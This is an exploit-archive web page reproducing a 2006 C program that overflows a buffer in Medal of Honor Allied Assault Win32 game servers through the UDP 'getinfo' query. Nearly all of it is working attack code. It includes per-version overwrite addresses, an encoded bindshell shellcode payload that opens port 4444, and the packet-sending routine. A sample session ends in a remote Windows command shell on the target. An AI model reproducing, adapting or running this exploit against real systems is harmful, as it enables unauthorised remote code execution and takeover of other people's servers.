首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Medal of Honor (getinfo) Remote Buffer Overflow Exploit
来源:runningbon@gmail.com 作者:RunningBon 发布时间:2006-05-11  

/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon

Please use this responsibly, as I am not responsible for any damage you cause by using it.

IRC: irc.rizon.net #kik
E-mail: runningbon@gmail.com

Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)

Example:

C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.

C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <windows.h>

struct VersionStruct {
char *pName;
DWORD dwNewEIP;
DWORD dwFillLength;
};

VersionStruct Versions[] = {
"MOHAA-v1.11", 0xCBB935, 516,
"MOHAA:S-v2.15", 0x923575, 516,
//Add MOHAA:Breakthrough support
};

#pragma comment (lib, "ws2_32.lib")

//Port 4444 bindshell
unsigned char szShellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
"\x11\x13\x38\x7e\x92\xec\xee\x81";

void Error(char *pString)
{
printf("[ERROR] %s\n", pString);
ExitProcess(0);
}

int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
WSAData WSADATA;
SOCKET Socket = NULL;
sockaddr_in SockAddr;
char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
char szBuffer[4096];
int iLen = 0;

WSAStartup(MAKEWORD(1, 1), &WSADATA);

if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
{
Error("socket()");
return 0;
}

SockAddr.sin_addr.s_addr = inet_addr(pIP);
SockAddr.sin_port = htons(iPort);
SockAddr.sin_family = AF_INET;

printf("Building packet.\n");

memset(szBuffer, 0, sizeof(szBuffer));

memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
iLen += sizeof(szHeader) - 1;

memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
iLen += pVersion->dwFillLength;

memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
iLen += sizeof(DWORD);

memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
iLen += sizeof(szShellcode);

printf("Sending packet.\n");

if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
{
Error("sendto()");
return 0;
}

printf("Packet sent.\n");

return 1;
}

void PrintWelcome()
{
printf(
"MoHAA Server Buffer overflow exploit\n"
"Written by RunningBon\n"
"E-Mail: runningbon@gmail.com\n"
"IRC: irc.rizon.net #kik\n"
"\n"
);
}

void PrintUsage(char *pPath)
{
printf("Usage: %s <IP> <Port> <Version Name>\n\n", pPath);

printf("Supported Version List:\n");
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
printf("%s\n", Versions[i].pName);
}
}

int main(int argc, char **argv)
{
VersionStruct *pVersion = NULL;

PrintWelcome();

if(argc < 4)
{
PrintUsage(argv[0]);
return 0;
}

for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
if(!stricmp(argv[3], Versions[i].pName))
{
pVersion = &Versions[i];
break;
}
}

if(pVersion == NULL)
{
Error("Invalid version.");
}

printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);

if(Exploit(argv[1], atoi(argv[2]), pVersion))
{
printf("Check for your shell on port 4444.\n");
}

return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Internet Explorer <= 6.0
·Unclassified NewsBoard <= 1
·Intel Wireless Service (s24evm
·Foing <= 0.7.0 (phpBB) Remo
·ActualAnalyzer Pro <= 6.88
·phpBB <= 2.0.20 (Admin/Rest
·Claroline e-Learning 1.75 (lda
·Sugar Suite Open Source <=
·Dokeos LMS <= 1.6.4 (authld
·freeSSHd 1.0.9 Key Exchange Al
·ISPConfig <= 2.2.2 (session
·PuTTy.exe <= 0.53 (validati
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved